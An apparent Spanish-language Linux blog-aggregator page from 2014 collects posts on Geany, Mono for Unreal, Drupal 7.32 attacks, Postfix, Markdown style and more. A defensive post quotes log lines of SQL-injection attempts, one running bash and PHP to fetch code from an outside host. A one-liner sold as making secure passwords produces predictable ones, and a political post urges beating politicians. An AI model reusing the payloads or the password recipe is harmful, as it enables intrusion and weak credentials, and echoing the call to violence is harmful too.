Geany-INFO: Added filetype Clojure (59).
Geany-INFO: Added filetype Genie (60).
Geany-INFO: Added filetype Scala (61).
Geany-INFO: Added filetype Cython (62).
Geany-INFO: Added filetype CUDA (63).
Geany-INFO: Added filetype Graphviz (64).
Geany-INFO: Loaded: /usr/lib/i386-linux-gnu/geany/autoclose.so (Autocierre)
Geany-INFO: Loaded: /usr/lib/i386-linux-gnu/geany/addons.so (Añadidos)
Geany-INFO: Loaded: /usr/lib/i386-linux-gnu/geany/defineformat.so (Definir formateador)
Attempt to unlock mutex that was not locked
Abortado

hago una prueba de llamar a geany, sin plugins, con la instrucción geany -p y abre perfectamente

toto@sidux:~$ geany -p

por lo que voy a ver (editar) el archivo ~/.config/geany/geany.conf para ver cuales plugins están activos y cual es él que esta dando problemas.

Solución

Después de probar quitando uno por uno, veo que es debugger.so el que da problemas, por lo cual borro de la lista, guardo, inicio geany y todo funciona bien nuevamente

la linea editada en la sección plugins, listado en active_plugins= quedo así después de borrar /usr/lib/i386-linux-gnu/geany/debugger.so; (efectivamente, tengo activados muchos plugins)


[plugins]
load_plugins=true
custom_plugin_path=
active_plugins=/usr/lib/i386-linux-gnu/geany/autoclose.so;/usr/lib/i386-linux-gnu/geany/addons.so;/usr/lib/i386-linux-gnu/geany/defineformat.so;/usr/lib/i386-linux-gnu/geany/geanypy.so;/usr/li
b/i386-linux-gnu/geany/geanymacro.so;/usr/lib/i386-linux-gnu/geany/multiterm.so;/usr/lib/i386-linux-gnu/geany/filebrowser.so;

Miguel de Icaza

Miguel de Icaza
Miguel de Icaza

Mono for Unreal Engine

Earlier this year, both Epic Games and CryTech made their Unreal Engine and CryEngine available under an affordable subscription model. These are both very sophisticated game engines that power some high end and popular games.

We had previously helped Unity bring Mono as the scripting language used in their engine and we now had a chance to do this over again.

Today I am happy to introduce Mono for Unreal Engine.

This is a project that allows Unreal Engine users to build their game code in C# or F#.

Take a look at this video for a quick overview of what we did:

This is a taste of what you get out of the box:

  • Create game projects purely in C#
  • Add C# to an existing project that uses C++ or Blueprints.
  • Access any API surfaced by Blueprint to C++, and easily surface C# classes to Blueprint.
  • Quick iteration: we fully support UnrealEngine's hot reloading, with the added twist that we support it from C#. This means that you hit "Build" in your IDE and the code is automatically reloaded into the editor (with live updates!)
  • Complete support for the .NET 4.5/Mobile Profile API. This means, all the APIs you love are available for you to use.
  • Async-based programming: we have added special game schedulers that allow you to use C# async naturally in any of your game logic. Beautiful and transparent.
  • Comprehensive API coverage of the Unreal Engine Blueprint API.

This is not a supported product by Xamarin. It is currently delivered as a source code package with patches that must be applied to a precise version of Unreal Engine before you can use it. If you want to use higher versions, or lower versions, you will likely need to adjust the patches on your own.

We have set up a mailing list that you can use to join the conversation about this project.

Visit the site for Mono for Unreal Engine to learn more.

(I no longer have time to manage comments on the blog, please use the mailing list to discuss).

Jueves 23 de octubre de 2014

Gunnar Wolf

Gunnar Wolf
Gunnar Wolf

Listadmin — *YES*

Petter posted yesterday about Listadmin, the quick way to moderate mailman lists.

Petter: THANKS.

I am a fan of automatization. But, yes, I had never thouguht of doing this. Why? Don't know. But this is way easier than using the Web interface for Mailman:

$ listadmin 
fetching data for conoc_des@my.example.org ... nothing in queue
fetching data for des_polit_pub@my.example.org ... nothing in queue
fetching data for econ_apl@my.example.org ... nothing in queue
fetching data for educ_ciencia_tec@my.example.org ... nothing in queue
fetching data for est_hacend_sec_pub@my.example.org ... 

[1/1] ============== est_hacend_sec_pub@my.example.org ======
From:     sender@example.org                                            
Subject:  Invitación al Taller Insumo Producto                          
Reason:   El cuerpo del mensaje es demasiado grande: 777499    Spam? 0  
Approve/Reject/Discard/Skip/view Body/Full/jump #/Undo/Help/Quit ? a
Submit changes? [yes] 

fetching data for fiscal_fin@my.example.org ... nothing in queue
fetching data for historia@my.example.org ... nothing in queue
fetching data for industrial@my.example.org ... nothing in queue
fetching data for medio_amb@my.example.org ... nothing in queue
fetching data for mundial@my.example.org ... nothing in queue
fetching data for pol_des@my.example.org ... nothing in queue
fetching data for sec_ener@my.example.org ... nothing in queue
fetching data for sec_prim@my.example.org ... nothing in queue
fetching data for trab_tec@my.example.org ... nothing in queue
fetching data for urb_reg@my.example.org ... nothing in queue
fetching data for global@my.example.org ... nothing in queue

I don't know how in many years of managing several mailing lists I never thought about this! I'm echoing this, as I know several of my readers run mailman as well, and might not be following Planet Debian.

Lunes 20 de octubre de 2014

Oswaldo Villa

Oswaldo Villa
Villatux Blog <--

Generar contraseñas random

Cuando generas muchas cuentas de usuario, es muy engorroso ponerle una contraseña a cada uno y asegurarte de que sea segura.


Con este comando puedes generar contraseñas tan seguras como gustes de manera random,  el cual puedes utilizar en tus scripts de creación de usuarios:


date +%s | md5sum | base64|  head -c 8 ; echo

Descripción:

date +%s  :  nos muestra la fecha en formato timestamp indicando los segundos
md5sum : encripta la salida anterior en md5
base64 :  encripta la salida anterior en base64
head -c 8: muestra solo los primeros 8 caracteres

Domingo 19 de octubre de 2014

Itzcoalt Alvarez Moreno

Itzcoalt Alvarez Moreno
Itzcoalt (itz) Álvarez

Seguros

Hace mas de un mes tuve un problema con el auto, por lo que la persona que daño mi vehículo llamo a su seguro a fin de responsabilizarse por los daños.

Debido al modelo de mi auto, seleccione que fuera atendido por la Agencia Nissan Fuji Automotriz, en donde fue recibido y empezo el proceso de reparacón.

Casi un mes después, paso a recoger mi vehículo y observo que vibra y que uno de los soportes del motor esta ROTO, lo reporto a la agencia, ellos a su vez al taller quien me dice que debo hablar directamente con la aseguradora.

Y en este momento, inician los problemas.

Para empezar, mi primera llamada no fue registrada en su sistema, y tuve que llamar 3 días después, el supervisor de calidad, me dice que el golpe fue de lado izquierdo, y que el soporte del motor esta del lado derecho por lo que no procede la reclamación, sin embargo, me indica que pasará su reporte y que contactaran al ajustador para validar con el la informacion.

 

Después de otras 4 días vuelvo a llamar, y el departamento de calidad de la aseguradora no desea tomarme la llamada, me canaliza nuevamente con el supervisor asignado a la agencia, y me indica que  ha recibido un correo en donde le indican que no procede, le pido copia del mismo, y se niega a proporcionarla.

Interesante que un departamento de calidad tenga problemas en la calidad del servicio que deben supervisar.

Es un hecho que antes del accidente el soporte del motor no estaba roto, sin embargo, la aseguradora no se hizo responsable, el ajustador incluyo en la orden de admisión la leyenda “mecánica a consecuencia“, sin embargo, ni la agencia, ni el seguro verificaron  que se le realizaran las pruebas necesarias al auto, a tal grado, que la propia agencia estaba entregándome el auto sin avisar del soporte roto, y la ¿calidad?, acaso, si no esta roto no implica que este “afectado”. donde queda la responsabilidad de la aseguradora y la agencia en estos casos.

Es preocupante que ninguna de las dos empresas se preocupen por el afectado y por la calidad de sus servicios.

Recomendaciones para casos similares.

1.- Tomen fotos de todos los ángulos del golpe, y de todo el motor.

2.- Valide o haga validar las fotos con el ajustador,  una forma fácil es tomar algunas con el de fondo :)

3.- El seguro y la Agencia no les importa lo que pase con tu auto y no te informaran del avance, llama,llama,llama, y si te es posible acude

4.- El seguro y la agencia solo se responsabilizan con lo que dice la orden de admisión y por ende, lo que dice el ajustador que esta roto, así que asegurarte te pongan todo, y apoyarte en las fotos en caso de problemas

5.- PROFECO es una opción,  sin embargo, esto llevara tiempo.

6.- Consideran la no contratación de aseguradoras que tienen este tipo de vicios en su organizacion.

 

Para el registro.

 

Aseguradora QUALITAS

Agencia: Fuji Automotriz.

 

 

Actualización.

Molesto por la atención recibida, pedí me indicaran el proceso para levantar una queja, me canalizaron al envío de un correo a la cuenta ccq@qualitas.com.mx.

 

El día 15 de Octubre envie el siguiente correo, y debo decir que hasta el día de hoy (18 de octubre) , no he recibido comunicación alguna por parte de la aseguradora, no hay correo de confirmación de recepción, no hay comunicación de un gerente, o en su caso de un departamento encargado de la atención al cliente, por lo que podemos decir, que es un buzon, que se va directo a  /dev/null

—- Correo —-

Numero de Reporte: 737617
Automovil: Sentra 2007.
Por medio del presente me dirigo a quien corresponda con el fin de levantar una queja en base a su servicio, y procedimiento de seguimiento hacia sus clientes.
Narrativa de hechos:

Soy el 3ero perjudicado dentro de un accidente ocurrido el dia 9 de Septiembre, quien golpeo mi auto tenia asegurada su unidad con ustedes.
El trato de su ajustador fue correcto, y fui canalizado a Fuji Automotriz. en donde el auto fue recibido y se procedio a la preparacion.

Anomalias:

Al recoger el auto, me percado que este VIBRA cuando esta encendido, procedo a revisar el motivo de esta vibracion y observo el soporte del motor Roto del lado opuesto a donde fue el golpe, la agencia me remite al taller automotriz, en donde en ninguna de las fotos que observamos se pude detemrinar el estado del soporte al momento de la recepcion del mismo y me indica que no esta cubierto este daño, que debo levantar una queja con Calidad de Quialitas.

Procedo a hacer esta llamada el dia 7de Octubre, en donde se me indica que lo canalizaran con el supervisor de Calidad, y que me llamaran, espero hasta el dia 10 de octubre sin respuesta alguna y decido llamar, y solo me entero que mi reporte anterior no fue levantado y que de acuerdo a la Base de datos de seguimiento no se reporto mi llamada, molesto les pido me auxilien por que tengo ya una SEMANA mas sin mi auto.

Atienden la llamada y ese mismo dia el supervidor de Calidad me llama para indicarme que de acuerdo a sus observaciones no procede el pago del soporte dañano. aun cuando comente que dicho daño no estaba antes del accidente, mis argumentos son desechados sin mayor afan que la de no cubrir el costo, toda que vez que aun que el no estubo en accidente, carece de la informacion del propio dueño y conductor del auto., el mismo supervisor me indica que el pasara su reporte a QUALITAS y que contactaran al Ajustador para verificar lo procedente, que Quialitas me llamará.

Pasan 3 dias y Quialitas no me llama, decido hacer la llamada personalmente para que me comuniquen con CALIDAD, y el area de calidad simplemente no me quiere tomar la llamada arguementando que el caso esta cerrado.

Punto importante, CERRADO si nunca Qualitas me llamo para darme esta informacion y quedamos en la espera de la informacion del Ajustador.

Quien me atiente, una recepcionista, tal vez sin el entrenamiento adecuado para las labores especifica del area de CALIDAD, me comunican nuevamente con el supervisor de CALIDAD asignado a la Agancia Fuji Automitriz, quien me informa que el dia de ayer recibio un correo en donde indican TEXTUALMENTE que no procede mi reclamacion, le pido me reenvie el correo, y me indica que no puede hacerlo.
QUEJA.

Cual es el seguimiento que dan a sus reportes, que ustedes como OFICINA CENTRAL no se comunicaron en ningun MOMENTO con un servidor para dar seguimiento a mi queja, en todo momento yo como cliente he tenido que hacer las llamadas para ver el seguimiento a una REPORTE de su area de CALIDAD.

Por que CALIDAD no desea contestar mi llamada argumentando que esta CERRADO el reporte y sin informarme el resultado del mismo, cual es el procedimiento para una queja de la CALIDAD del servicio que de su departamento de CALIDAD?

Por que la Agencia no reviso el auto antes de entregarlo y peor aun, por que la agencia no valido que la entrega de la unidas se haya realizado acorde a un protocolo.?, mas si dentro de la orden de admision se estipulo “MECANICA a CONSECUENCIA”, si la afectacion fuera en un soporte de la suspencion o en alguna otra parte que quedará dañada producto del accidente, este daño no seria identificado de manera VISUAL, luego entoces… hasta donde llega la responsabilidad en la reparacion de una unidad que ingreso con esa nota “MECANICA a CONSECUENCIA”

¿Que Pruebas se realizaron a la unidad para descartar otros daños? fuera de los observador VISUALMENTE por el ajustador?
En cuanto al hecho de no querer pagar el daño del soporte al motor, me parece un error, toda vez, que como dueño de la unidad les afirmo, el daño no estaba antes del Accidente, por que no me mostraron las fotos que tomo el ajustador y que integran el expediente?

Quedo en espera de sus comentarios y de acciones.

Atentamente.

Izcoalt Alvarez Moreno.

—- Correo —-

 

Sábado 18 de octubre de 2014

Ocurrencias

Iba a escribir que citas citables, pero el único que me ha citado soy yo, en este mensaje, como ya tengo varios posts que son un montón de citas celebres, me puse a pensar en algunas mías, que no suenan tan mal que he dicho, que repito por ahí y pues que mejor lugar que aquí para ponerlas.

“Es mejor si podemos ayudar a unos pocos, que si solo nos quedamos lamentándonos de no poder ayudar a todos”

“Es mejor si hacemos algo por unos cuantos, que si nos lamentamos de no hacer nada para todos”

“Si no citan, se les ocurrió a ustedes, son muy listos o fue iluminación divina o están cometiendo plagio, como es poco probable que se les haya ocurrido, y todavía no son tan listos…  mejor citen”

“Por supuesto que ocurrió un problema al enviar correo, el servidor de correo, no está instalado en la máquina, no se puede enviar correo”

“Practicar una exposición, es útil, grabarse es todavía mejor, no sabemos cómo nos movemos cuando exponemos o que expresiones usamos o nuestras muletillas, a esta altura del curso ya han de identificar las que más uso […] pero la ventaja de saberlas es no quedarse atorado y no ponerse nervioso de descubrirse usándolas”

“¿Se han preguntado por qué es así?”

“Seguro esto ya lo saben, pero de todas formas es algo que vale la pena volver a tratar…”

“Esto debieron de haberlo visto en […] pero en caso de que no lo tengan tan presente vamos a recordarlo”

“Seguro cuando estudiaron les enseñaron esto y han hecho lo posible por olvidarlo, ya que quien se los enseño lo hizo de la manera más aburrida, complicada y tediosa…”

“Existen muchos consejos para estar tranquilo (antes de exponer), a algunos les funciona caminar, a otros tomar agua, a unos más meditar, sin embargo todos somos distintos por cada consejo habrá alguien a quien eso lo pone nervioso, el único que podemos dar para todos es preparar bien la exposición y estar seguros de que lo que tenemos que decir es importante, que si nos equivocamos no se va acabar el mundo y si sale bien, lo podemos volver a hacer”

“¿No hay ninguna pregunta?, ¿todo quedo claro?, ‘tan claro como el petróleo?”

“No hay preguntas tontas, hay tontos que no preguntan”

Viernes 17 de octubre de 2014

Gunnar Wolf

Gunnar Wolf
Gunnar Wolf

#Drupal7 sites under attack — Don't panic!

Two days ago, Drupal announced version 7.32 was available. This version fixes a particularly nasty bug, allowing a SQL injection at any stage of interaction (that means, previous to the authentication taking place).

As soon as I could, I prepared and uploaded Debian packages for this — So if you run a Debian-provided Drupal installation, update now. The updated versions are:

sid / jessie (unstable / testing)
7.32-1
wheezy (stable)
7.14-2+deb7u7
wheezy-backports
7.32-1~bpo70+1
squeeze-backports (oldstable)
7.14-2+deb7u7~bpo60+1

And, as expected, I'm already getting several attacks on my sites. Good thing that will help you anyway: Even though it won't prevent the attack from happening, if you use suhosin, several of the attacks will be prevented. Yes, sadly suhosin has not been in a stable Debian release since Wheezy, but still... :-|

Partial logs. This looks like a shellcode being injected as a file created via the menu_router mechanism (shellcode snipped):

  1. Oct 16 15:22:21 lafa suhosin[3723]: ALERT - configured request variable
  2. total name length limit exceeded - dropped variable 'name[0; INSERT INTO
  3. `menu_router` (`path`, `load_functions`, `to_arg_functions`, `description`,
  4. `access_callback`, `access_arguments`) VALUES ('deheky', '', '', 'deheky',
  5. 'file_put_contents',
  6. +0x613a323a7b693a303b733a32323a226d6f64756c65732f64626c6f672f746e777(...)
  7. );;# ]' (attacker '62.76.191.119', file '/usr/share/drupal7/index.php')

While the previous one is clearly targetting this particular bug, I'm not sure about this next one: It is just checking for some injection viability before telling me its real intentions:

  1. Oct 17 10:26:04 lafa suhosin[3644]: ALERT - configured request variable
  2. name length limit exceeded - dropped variable
  3. '/bin/bash_-c_"php_-r_\"file_get_contents(
  4. 'http://hello_hacked_jp/hello/?l'
  5. (attacker '77.79.40.195', file '/usr/share/drupal7/index.php')

So... looking at my logs from the last two days, Suhosin has not let any such attack reach Drupal (or I have been h4x0red and the logs have all been cleaned — Cannot dismiss that possibility :-) )

Anyway... We shall see many such attempts in the next weeks :-|

[update] Yes, I'm not the only one reporting this attack in the wild. Zion Security explains the same attempt I logged: It attempts to inject PHP code so it can be easily executed remotely (and game over for the admin!)

For the more curious, Tamer Zoubi explains the nature and exploitation of this bug.

Martes 14 de octubre de 2014

Gerónimo Orozco

Gerónimo Orozco
Patux's booring news

OpenStackGDL October 2014

Registrate


César Yáñez Fernández

Lista de Donación de Libros

En el área de cómputo, al igual que en otras áreas y ciencias, existe mucha literatura, libros de texto, manuales, documentos, artículos, etcétera. Uno cuando empieza a recabar esta información, llega el momento que necesitas espacio.

Un libro es como un ser vivo, que necesita ser adoptado para que siga cumpliendo su función, para que se mantenga vivo. Es por esto que me doy a la tarea de crear una lista de libros que se encuentran disponibles para adoptar.

Si alguien quiere uno de los libros listados, se sugiere cumplir las siguientes condiciones:

  1. El libro no está en venta, ni tiene un precio definido.
  2. El libro es donado, sin un costo por el libro.
  3. Para pedir un libro, me pueden contactar personalmente.
  4. El libro será enviado por Correos de México.
  5. Si el solicitante prefiere otro método de envío (DHL, UPS), el solicitante deberá pagar por el envío.
  6. Si se solicita más de 1 libro, el paquete será enviado por DHL, y el solicitante deberá pagar por el envío.

La lista de libros aún no está completa, y no sólo habrá libros de cómputo, esta lista se irá actualizando con más libros y se eliminarán los que ya fueron adoptados.

Miguel de Icaza

Miguel de Icaza
Miguel de Icaza

.NET Foundation: Forums and Advisory Council

Today, I want to share some news from the .NET Foundation.

Forums: We are launching the official .NET Foundation forums to engage with the larger .NET community and to start the flow of ideas on the future of .NET, the community of users of .NET, and the community of contributors to the .NET ecosystem.

Please join us at forums.dotnetfoundation.org. We are using the powerful Discourse platform. Come join us!

Advisory Council: We want to make the .NET Foundation open and transparent. To achieve that goal, we decided to create an advisory council. But we need your help in shaping the advisory council: its role, its reach, its obligations and its influence on the foundation itself.

To bootstrap the discussion, we have a baseline proposal that was contributed by Shaun Walker. We want to invite the larger .NET community to a conversation about this proposal and help us shape the advisory council.

Check out the Call for Public Comments which has a link to the baseline proposal and come join the discussion at the .NET Forums.

Planeta Laguna: Problemas con la tarjeta Nvidia al actualizar Manjaro

Lunes 13 de octubre de 2014

Eduardo Ruiz Duarte

Eduardo Ruiz Duarte
beck's site

Leyes fundamentales de la estupidez humana (Carlo M Cipolla)

Esto es algo que me llamó la atención, gracias a Omar Lara que me lo compartió
es un tratado formal sobre la estupidez humana, el artículo completo aquí


Introducción

"La humanidad se encuentra (y sobre esto el acuerdo es unánime) en un estado deplorable. Ahora bien, no se trata de ninguna novedad. Si uno se atreve a mirar hacia atrás, se da cuenta de que siempre ha estado en una situación deplorable. El pesado fardo de desdichas y miserias que los seres humanos deben soportar, ya sea como individuos o como miembros de la sociedad organizada, es básicamente el resultado del modo extremadamente improbable (y me atrevería a decir estúpido) como fue organizada la vida desde sus comienzos. 
Desde Darwin sabemos que compartimos nuestro origen con las otras especies del reino animal, y todas las especies -ya se sabe- desde el gusanillo al elefante tienen que soportar sus dosis cotidianas de tribulaciones, temores, frustraciones, penas y adversidades. Los seres humanos, sin embargo, poseen el privilegio de tener que cargar con un peso añadido, una dosis extra de tribulaciones cotidianas provocadas por un grupo de personas que pertenecen al propio género humano. Este grupo es mucho más poderoso que la Mafia, o que el complejo industrial-militar o que la Internacional Comunista. Se trata de un grupo no organizado, que no se rige por ninguna ley, que no tiene jefe, ni presidente, ni estatuto, pero que consigue, no obstante, estar en perfecta sintonía, como si estuviese guiado por una mano invisible, de tal modo que las actividades de cada uno de sus miembros contribuyen poderosamente a reforzar y ampliar la eficacia de la actividad de todos los demás miembros. La naturaleza, el carácter y el comportamiento de los miembros de este grupo constituyen el tema de las páginas que siguen. 
Es preciso subrayar a este respecto que este ensayo no es ni producto del cinismo ni un ejercicio de derrotismo social -no más de cuanto pueda serlo un libro de microbiología-. Las páginas que siguen son, de hecho, el resultado de un esfuerzo constructivo por investigar, conocer y, por lo tanto, posiblemente neutralizar, una de las más poderosas y oscuras fuerzas que impiden el crecimiento del bienestar y de la felicidad humana. "



1. Siempre e inevitablemente cada uno de nosotros subestima el número de individuos 
  estúpidos que circulan por el mundo

2. La probabilidad de que una persona determinada sea una estúpida es independiente 
  de cualquier otra característica de la misma persona

3. Una persona estúpida es una persona que causa un daño a otra persona o grupo de 
  personas sin obtener, al mismo tiempo, un provecho para sí, o incluso obteniendo un 
  perjuicio. 

4. Las personas no estúpidas subestiman siempre el potencial nocivo de las personas 
  estúpidas. Los no estúpidos, en especial, olvidan constantemente que en cualquier 
  momento y lugar, y en cualquier circunstancia, tratar y/o asociarse con individuos 
  estúpidos se manifiesta infaliblemente como costosísimo error. 


Carlo M Cipolla

Emerson Posadas

Emerson Posadas
toxickore BLOG

¿Qué pasó después de 99 days of freedom?

Después de 99 días de "libertad" puedo decir lo siguiente:

  • No pude completar el reto
  • Mi círculo social y familiar es altamente dependiente de facebook
  • Si no estás en facebook, no te avisan de muchos eventos sociales de esos círculos familiares/sociales
  • Reviso la red social cada 3-7 días, a veces me entero de chats muchos días después
  • Vives tu realidad al estar alejado de la red social
  • Dejas de fantasear/competir/presumir/pelear/intoxicar/desperdiciar
  • Aprovechas mejor tu tiempo libre
  • Al ver a tus amigos o conocidos en persona, te interesa X 2 hablar con ellos de lo que han hecho
  • Distingues las amistades/familiares cercanas(os) de las amistades(familiares) virtuales, quién está cerca y quién no está.
Post data:
También puedes filtrar todo el contenido de las personas para dejar solo lo que te interese, de modo que no te requemes todas esas telenovelas o contenido que de poco sirve.
Alcance Libre: Curso Global de Servidores con CentOS 6.
Planeta Laguna: PoC Shell Sock Reverse Shell cgi-bin

Domingo 12 de octubre de 2014

Eduardo Ruiz Duarte

Eduardo Ruiz Duarte
beck's site

Otro post más de política (yapp)

Sobre la agresión física a Cárdenas y los ideales inocentes anarquistas
Y pseudo humanistas de libertad de la nueva juventud izquierdista mexicana (o sea yo y muchos más)

Para mí que sí los pateen que se de cuenta la “izquierda“ que tampoco los queremos y que decepcionaron a la clase baja con sus ambiciones derechistas y la misma sed de poder de siempre.

Violencia... Sí, ya es hora de los madrazos,país con 60 millones de paupérrimos... Y Todos somos luchadores sociales en twitter y facebook... Y nos indignamos por unas patadas a otro power-retarded.

No violencia? Ok como a los normalistas... Iguala...

Vivimos con un concepto de libertad y paz muy inocente... Y un tanto estúpido porque no resuelve nada... Te mantiene constante y en 0.

Todos quieren todo para todos y se manifiestan a veces muy enérgicos exigiendo como si te fueran a escuchar.

Es más escuchado el agresor anarquista que el pasivo con pancarta créanme... (Aunque no necesariamente más inteligente)

No se puede todo igual para todos... En serio no con ese idealismo y pseudohumanismo... Si quieres algo cercano a eso hay que comenzar a cambiar los modelos económicos... Madrear gente pa sacar del poder y comenzar a considerar los tabúes como ideas no tan estupidas... Tipo “privatización“... Después de los madrazos las cosas se tienen que reconsiderar... En europa todo está como en méxico se niegan.

Ley de telecomm en europa similar a mx lleva años... Y es para agarrar pedófilos y asesinos... Mientras no se tengan checados a todos no puedes tener sospechosos... Ahora si no quieres eso en tu ley... No te quejes del crimen organizado y acepta el hecho de que jamás resolverán tu caso.

El petróleo en europa está privatizado desde hace décadas y hay bastante en el norte... No tanto como méxico.

Pero vale madre porque las empresas privadas pagan muchos impuestos,hay competencia y mucho empleo.... Por lo tanto baja de precios y el país genera energía eólica y solar por todos lados... Tanta que le sobra y se la venden a países vecinos... Así que no hay que preocuparse sólo por un recurso energético... En méxico deberíamos manifestarnos mejor por poner plantas eólicas en todo el país y placas fotovoltaicas en cada techo por ley.

El no enfocarse sólo en petróleo los hace más ecologistas que todos los que se manifiestan porque no destruyan una playa en méxico,los hace generar más tecnología sin pensar en que es “verde“ porque en esencia cualquier consecuencia ya lo es.

Hay que reconsiderar las ideas que tal vez nuestros padres nos inculcaron para “defender“, los tiempos cambian... Y creo que la inocencia convierte los argumentos en falacias... Hay que saber qué defender.

Así que en resumen... Pateen,sáquenlos del trono los que puedan/podamos....

Respeto?

No... Nunca te respetaron... Te agredieron y mataron a tus abuelos... Padres... O tíos... No merecen ni que los menciones... Y cambia tus paradigmas... Ábrelos más al progresismo... La idea romántica pseudo anarquista que la “joven izquierda“ traemos... Es sólo un modelo en el cual tenemos que considerar como una utopía en el sentido estricto de la palabra. (no imposibilidad) sino el modelo que debemos intentar cada día como individuos y no como sociedad.

Vamos a darle,somos muchos y tenemos buenas ideas... Sólo hay que organizarlas.

Saludos

Sábado 11 de octubre de 2014

Xenode Systems: Linux: Un WINEPREFIX para cada aplicación Wine instalada

Viernes 10 de octubre de 2014

Luis Armando Medina

Luis Armando Medina
Como Instalar Linux

Que hacer después de instalar Ubuntu 14.04

Ubuntu 14.04 LTS  fue lanzado hace ya varios meses con muy buenas criticas en su haber y se ha mencionado en varias publicaciones que es la mejor versión de Ubuntu que se ha lanzado en los últimos años y comparto esta afirmación. Ubuntu 14.04 está instalado en mi laptop principal y si estás leyendo este […]
Luis Armando Medina

Luis Armando Medina
Como Instalar Linux

Netflix ahora funciona en Ubuntu y Linux Mint sin hacks

Netflix ahora esta gran aplicación o servicio está disponible para los usuarios de Ubuntu y Linux Mint (es lo que he probado que funciona) sin necesidad de hacer ninguna modificación.

Jueves 09 de octubre de 2014

Planeta Laguna: dnsmasq como servidor local de DNS

Miércoles 08 de octubre de 2014

Héctor Daniel Cortés

Héctor Daniel Cortés
'Aztec Eagle' Turbo

¿Dónde te agarró el temblor?

2014-10-08 02:40:54 (M6.2) GULF OF CALIFORNIA 23.8 -108.4 (82934)



Region: GULF OF CALIFORNIA
Geographic coordinates: 23.817N, 108.423W
Magnitude: 6.2
Depth: 10 km
Universal Time (UTC): 8 Oct 2014 02:40:54
Time near the Epicenter: 7 Oct 2014 19:40:54
Local standard time in your area: 7 Oct 2014 20:40:54

Location with respect to nearby cities:
121 km (75 mi) WSW of El Dorado, Mexico
128 km (79 mi) SW of Navolato, Mexico
128 km (79 mi) SW of Campo Gobierno, Mexico
135 km (83 mi) SW of Costa Rica, Mexico
1077 km (667 mi) WNW of Mexico City, Mexico


ADDITIONAL EARTHQUAKE PARAMETERS
________________________________
event ID : us b000sjt0

This is a computer-generated message and has not yet been reviewed by a
seismologist.
For subsequent updates, maps, and technical information, see:
http://earthquake.usgs.gov/earthquakes/eventpage/usb000sjt0
or
http://earthquake.usgs.gov/

National Earthquake Information Center
U.S. Geological Survey
http://earthquake.usgs.gov/regional/neic/


DISCLAIMER: https://sslearthquake.usgs.gov/ens/help.html?page=help#disclaimer

Martes 07 de octubre de 2014

Planeta Laguna: Shell Shock Reverse Shell DHCP
Oswaldo Villa

Oswaldo Villa
Villatux Blog <--

Error en Postfix "Message size exceeds fixed limit"

Cuando ocurre este error no pueden salir correos por medio de el servidor, y esto es debido a que el correo es muy pesado o el adjunto está muy grande y pesado.

Para solucionarlo cambiamos los valores de /etc/postfix/main.cf a lo siguiente :

mailbox_size_limit = 0
message_size_limit = 0
virtual_mailbox_limit = 0



si no tienes estos parámetros, puedes incluirlos en el archivo de configuración



Domingo 05 de octubre de 2014

FSL se acerca

Jueves 02 de octubre de 2014

Renich Bon Ciric

HowTo: How to use your jack audio card with pulseaudio in Fedora 20

I, honestly, don’t know what happens here. I dunno if you’re delegating pulseaudio to jack or viseversa. Anyway, I use this method to enable my Focusrite Scarlett 18i20 in Fedora 20. I hope it helps out:

Procedure

#!/usr/bin/env bash

pulseaudio -k
pulseaudio -k
pulseaudio -k

pactl load-module module-jack-source;
pactl load-module module-jack-sink

After that (in GNOME 3), just go to Settings > Sound > Output and choose “Jack sink” as the default device. It should now work as your main audio output device.

Let me know, with your comments, of any success stories or feedback you might provide.

Miércoles 01 de octubre de 2014

Miguel de Icaza

Miguel de Icaza
Miguel de Icaza

Markdown Style Guide

Markdown is as a file format for easily producing text that can be pleasantly read both on the web and while using command line tools, or plain text editors.

Recently, a crop of tools have emerged that deliver some form of WYSIWYG or side-by-side authoring tools to assist writers to visualize the final output as they work.

Authors are turning to these tools to produce documentation that looks good when authoring the document, yet the tools are not true to the spirit and goals of markdown. And in some cases, authors are not familiar with the essence of what makes markdown great, nor the philosophy behind it:

Readability, however, is emphasized above all else. A Markdown-formatted document should be publishable as-is, as plain text, without looking like it’s been marked up with tags or formatting instructions.

Using these editors is the modern equivalent of using Microsoft Word to produce HTML documentation.

The generated markdown files very easy to produce, but are not suitable for human consumption. They likely violate a number of international treaties and probably will be banned by the EU.

This short post is a set of simple rules to improve your markdown.

They will help you deliver delight to all of your users, not just those using a web browser, but also those casually reading your documentation with a file manager, their console, and most importantly, potential contributors and copy editors that have to interact with your text.

Wrap Your Text

The ideal reading length for reading prose with a monospaced font is somewhere between 72 and 78 characters.

This is text snippet is from Mark Twain's Adventures of Tom Sawyer, with text wrapped around column 72, when reading in an 80x25 console:

It wont matter if you are using a larger console, the text will still be pleasant to read.

But if you use some of these markdown editors that do not bother wrapping your text, this is what the user would get:

And this is what is more likely to happen, with big consoles on big displays:

There is a reason why most web sites set a maximum width for the places where text will be displayed. It is just too obnoxious to read otherwise.

Many text editors have the ability of reformatting text your text when you make changes.

This is how you can fill your text in some common editors:

  • Emacs: Alt-Q will reformat your paragraph.
  • Vim: "V" (to start selection) then "gq" will reformat your selection.
  • TextMate: Control-Q.

Considering Using Two Spaces After a Period

When reading text on the console, using two spaces after a period makes it easier to see where phrases end and start.

While there is some debate as to the righteouness of one vs two spaces in the word of advanced typography these do not apply to markdown text. When markdown is rendered into HTML, the browser will ignore the two spaces and turn it into one, but you will give your users the extra visual cues that they need when reading text.

If you are interested in the topic, check these posts by Heraclitean River and DitchWalk.

Sample Code

For small code snippets, it is best if you just indent your code with spaces, as this will make your console experience more pleasant to use.

Recently many tools started delimiting code with the "```". While this has its place in large chunks of text, for small snippets, it is the visual equivalent of being punched in the face.

Try to punch your readers in the face only when absolutely necessary.

Headers

Unless you have plans to use multiple-nested level of headers, use the underline syntax for your headers, as this is visually very easy to scan when reading on a console.

That is, use:

Chapter Four: Which iPhone 6 is Right For You.
==============================================

In the previous chapter we established the requirement to buy iPhones
in packs of six.  Now you must choose just whether you are going to go
for an apologetically aluminum case, or an unapologetically plastic
iPhone.
	

Instead of the Atx-style headers:

# Chapter Four: Which iPhone 6 is Right For You.
	

The second style can easily drown in a body of text, and can not help as a visual aid to see where new sections start.

Blockquotes

While markdown allows you to only set the first character for a blockquote, like this:

> his is a blockquote with two paragraphs. Lorem ipsum dolor sit amet,
consectetuer adipiscing elit. Aliquam hendrerit mi posuere lectus.
Vestibulum enim wisi, viverra nec, fringilla in, laoreet vitae, risus.
	

Editors like Emacs, can reformat that text just fine, all you have to do is set the "Fill Prefix", by positioning your cursor after the "> " and use Control-x ., then you can use the regular fill command: Alt-Q, and this will produce:

> This is a blockquote with two paragraphs. Lorem ipsum dolor sit amet,
